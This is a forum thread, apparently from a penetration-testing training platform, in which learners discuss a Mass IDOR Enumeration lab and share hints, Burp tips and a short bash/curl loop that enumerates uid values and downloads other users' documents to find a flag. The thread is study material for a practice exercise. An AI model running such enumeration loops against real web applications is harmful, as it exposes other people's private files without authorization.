Web Attacks

Hello, I am going through the web attacks module. In the Mass IDOR Enumeration section I have a question. The entire section is talking about uid and enumerating them.

However when I spawn my target nothing on the target at all has any uid anywhere that I can see…

So my question is am I just missing something here? Or is there something wrong with the target being spawned? I did find an API I can enumerate but I don’t see any flag file anywhere and again there are 0 uids anywhere in the web app.

NVM… I found the UID it just wasn’t in the URL like the examples showed. Looking more carefuly though burp the UID is much more obvious.

Would you care to elaborate? I’m having the same problem and get nothing when I run the shell script with pdf or txt.

Did you look at the requests in BURP?

Ahh I see. I mean, obviously I did not do it right but I used the bash script, the intruder, etc and everything else they talked about but nothing. It’s just weird how they do that so much, talk about one thing and then do something COMPLETELY different. Don’t get me wrong, I love it, it’s just weird.


Got it, thank you sir. Somehow starting at that exact same screen for hours I still missed it until you said that.

I believe the idea is to make us think outside the box. In real life Pentests you have to do a lot of independent research and outside thinking. I have noticed the pattern in the Academy, they intentionally leave things out to make you look at in at a different angle. I know how that goes, I have spent days on some of these modules. Glad you got it!


Yeah you are right. I completely agree. Well they sure do a good job then! Thanks for your help :slight_smile:

Anytime. I sure need the help often enough in here!

1 Like

u can try random
curl -s -X POST http://ip:port/documents.php -d uid=1-20
u wil find flag???.txt
after u try wget file and cat file
u will found flag

1 Like

Use burp suite it will give all the info

So clicking the Documents link would not work for me if I used Firefox instead of Burp’s internal browser.

Once I used the internal browser, clicking http://SERVER:PORT/Documents worked, and I could see the POST request in Burp.

When I modified the script from the module to find extensions other than just .pdf and to curl POST requests (instead of the GET request in the example), I struggled to get the wget to download non-pdf files.

So I replaced the wget -q $url/$link with curl -O $url/$link, which seemed to work.

Was far more difficult than I anticipated. Is there an easier way that I’m missing?

Here is my final script, but give it a go yourself before revealing it!!



for i in {1..20}; do
    for link in $(curl -s -X POST -d "uid=$i" "$url/documents.php" | grep -oP "\/documents.*?\\.\\w+"); do
        curl -O $url/$link

Although, I support your claim, riddling and reinstructing are not the same. Thus, the frustration everyone feels is extremely justifiable for a subscription-based learning platform that promotes the former. It does not benefit students to force them to rethink and develop poor study habits.

1 Like

Or, the creators simply cannot properly instruct nor reinstruct payees without riddling in a childlike manner. Directly asking tough questions with the intent being to research on specific topics prior to responding would be more conducive if it actually counted towards the cube-collecting interactive modular work and could have benefital results come of it for those who are skills building for a career in Information Technology, Cybersecurity, Pentesting etc.

1 Like

I believe that you are spot on about the Regular Expression Language (Regex) character in the for link loop of the bash script.

Might I suggest using the wget -v Command Line Tool (clt).

The verbose flag of wget is more descriptive whilst your method can be seen as intentionally vague for some ■■■■■ reason.

The encoded flag text can be recognized by a specific Uniform Resource Locator (url) query string.

1 Like

I had a hard time finding the flag from the examples on this forum. I did notice the downloaded pdf file was a MD5 hash of 1 and the get document script referenced 1 so I took the long way and incremented 1 to 20 until I found the flag.

To all those who feel stuck in this and other ctfs, my piece of advice is not to make my mistake of wanting to finish the ctf quickly or when very tired. I approached this very ctf after a long day of work (I am a QA engineer), I was very tired and though I read both the text of the module and this thread many, many times, I was not able to understand anything about how to complete this ctf, even if the advice given in this thread is self-explanatory. Then I decided to stop and clear my mind during the morning and early evening of the following day, by forcing myself not to think of this ctf at all. When I went back to the ctf half an hour ago, I immediately understood the mistakes I was making the day before and how to solve it.

1 Like

The scripts did not work for me. I managed to complete Mass IDOR enumeration and Bypassing Encoded Characters without scripts using only burp Intruder.

Thanks Buddy :wink:

IF like me YOU GET HERE after you have been looking around the internet for an answer, you have found some script and it still doesnt’t work; swap your wget command for curl -O $url/$link . No need for burp or zap etc, just bash and curl . DM me if you get stuck :smile_cat:

1 Like